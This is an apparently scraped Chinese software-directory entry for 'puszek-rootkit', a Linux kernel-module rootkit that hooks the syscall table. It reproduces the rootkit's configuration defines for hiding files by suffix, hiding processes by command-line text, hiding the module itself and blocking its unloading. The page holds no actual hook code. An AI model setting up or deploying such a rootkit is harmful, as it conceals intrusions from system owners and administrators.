开源软件名称(OpenSource Name):Eterna1/puszek-rootkit开源软件地址(OpenSource Url):https://github.com/Eterna1/puszek-rootkit开源编程语言(OpenSource Language):C 99.4%开源软件介绍(OpenSource Introduction):PuszekYet another LKM rootkit for Linux. It hooks syscall table. Features:
Examples:
Configuration:The configuration is placed at the beginning of file //beginning of the rootkit's configuration
#define FILE_SUFFIX ".rootkit" //hiding files with names ending on defined suffix
#define COMMAND_CONTAINS ".//./" //hiding processes which cmdline contains defined text
#define ROOTKIT_NAME "rootkit" //you need to type here name of this module to make this module hidden
#define SYSCALL_MODIFY_METHOD PAGE_RW //method of making syscall table writeable, CR0 or PAGE_RW
#define UNABLE_TO_UNLOAD 0
#define DEBUG 0 //this is for me :)
//end of configuration Tested on:
|
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论